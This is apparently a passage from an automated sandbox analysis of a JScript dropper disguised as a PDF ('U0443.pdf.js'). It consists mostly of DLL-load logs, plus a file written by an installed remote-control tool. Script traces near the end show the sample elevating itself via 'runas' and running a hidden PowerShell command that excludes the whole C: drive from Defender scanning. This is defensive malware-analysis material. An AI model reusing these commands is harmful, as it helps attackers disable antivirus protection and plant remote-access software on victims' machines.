          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ngcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: authz.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ngcctnrsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ngcctnrgidshandler.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ktmw32.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ngcctnr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile written: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppd.ini
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Windows\System32\wscript.exeAutomated click: OK
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: U0443.pdf.jsStatic file information: File size 2364898 > 1048576

          Data Obfuscation

          barindex
          JScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:false");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:false");ITextStream.WriteLine(" entry:270445 f:LAPEJENFFIZIC");ITextStream.WriteLine(" exec:270586 f:LAPEJENFFIZIC");IHost.Name();ITextStream.WriteLine(" entry:270591 o:Windows%20Script%20Host f:CreateObject a0:%22Shell.Application%22");IHost.CreateObject("Shell.Application");IHost.Name();IShellDispatch6._00000000();ITextStream.WriteLine(" exit:270591 o:Windows%20Script%20Host f:CreateObject r:");IHost.ScriptFullName();IShellDispatch6._00000000();ITextStream.WriteLine(" entry:270604 o: f:ShellExecute a0:%22wscript.exe%22 a1:%22%22C%3A%5CUsers%5Cuser%5CDesktop%5CU0443.pdf.js%22%20%2Felevated%22 a2:%22%22 a3:%22runas%22 a4:1");IShellDispatch6.ShellExecute("wscript.exe", ""C:\Users\user\Desktop\U0443.pdf.js" ", "", "runas", "1");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register r:undefined");IHost.Name();ITextStream.WriteLine(" entry:270330 o:Windows%20Script%20Host f:Sleep a0:15000");IHost.Sleep("15000");IHost.Name();ITextStream.WriteLine(" exit:270330 o:Windows%20Script%20Host f:Sleep r:undefined");IHost.Name();ITextStream.WriteLine(" entry:270356 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated")
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:true");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:true");ITextStream.WriteLine(" entry:270419 f:OHLHDFAUNYRYPBJOP");ITextStream.WriteLine(" exec:270624 f:OHLHDFAUNYRYPBJOP");IWshShell3._00000000();ITextStream.WriteLine(" entry:270638 o: f:Run a0:%22powershell.exe%20-Command%20%22Add-MpPreference%20-ExclusionPath%20'C%3A%5C'%22%22 a1:0 a2:true");IWshShell3.Run("powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"", "0", "true");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog.net%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog.net%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog.net%22 f:lastIndexOf r:4");ITextStream.WriteLine(" entry:263630 o:%22goog.net%22 f:substr a0:0 a1:4");ITextStream.WriteLine(" exit:263630 o:%22goog.net%22 f:substr r:%22goog%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog%22 f:lastIndexOf r:-1");ITextStream.WriteLine(" entry:263630 o:%22goog%22 f:substr a0:0 a1:-1");ITextStream.WriteLine(" exit:263630 o:%22goog%22 f:substr r:%22%22");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263626 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exec:263412 f:");ITextStream.WriteLine(" exit:263763 f:cd r:%5Bobject%20Object%5D");ITextStream.WriteLine(" exit:268445 o:%5Bobject%20Object%5D f:getLogger r:%5Bobject%20Object%5D");ITextStream.WriteLine(" entry:270291 o:%5Bobject%20Object%5D f:register a0:function%20(a)");ITextStream.WriteLine(" exec:166942 f:");ITextStream.WriteLine(" exit:270291 o:%5Bobject%20Object%5D f:register
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:270356 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:270354 o: f:ExpandEnvironmentStrings a0:%22%25APPDATA%25%22");IWshShell3.ExpandEnvironmentStrings("%APPDATA%");IWshShell3._00000000();ITextStream.WriteLine(" exit:270354 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");ITextStream.WriteLine(" entry:270413 f:IROSKEICDVTJLGCZLYGLCEVPP");ITextStream.WriteLine(" exec:270384 f:IROSKEICDVTJLGCZLYGLCEVPP");IHost.Arguments();IArguments2.Named();IWSHNamedArguments.Item();ITextStream.WriteLine(" entry:270387 o: f:Exists a0:%22elevated%22");IWSHNamedArguments.Exists("elevated");IWSHNamedArguments.Item();ITextStream.WriteLine(" exit:270387 o: f:Exists r:true");ITextStream.WriteLine(" exit:270413 f:IROSKEICDVTJLGCZLYGLCEVPP r:true");ITextStream.WriteLine(" entry:270419 f:OHLHDFAUNYRYPBJOP");ITextStream.WriteLine(" exec:270624 f:OHLHDFAUNYRYPBJOP");IWshShell3._00000000();ITextStream.WriteLine(" entry:270638 o: f:Run a0:%22powershell.exe%20-Command%20%22Add-MpPreference%20-ExclusionPath%20'C%3A%5C'%22%22 a1:0 a2:true");IWshShell3.Run("powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"", "0", "true");ITextStream.WriteLine(" entry:263626 f:cd a0:%5Bobject%20Object%5D a1:%22goog.net%22");ITextStream.WriteLine(" exec:263584 f:");ITextStream.WriteLine(" entry:263617 o:%22goog.net%22 f:lastIndexOf a0:%22.%22");ITextStream.WriteLine(" exit:263617 o:%22goog.net%22 f:lastIndexOf r:4");ITextStream.WriteLine(" entry:263630 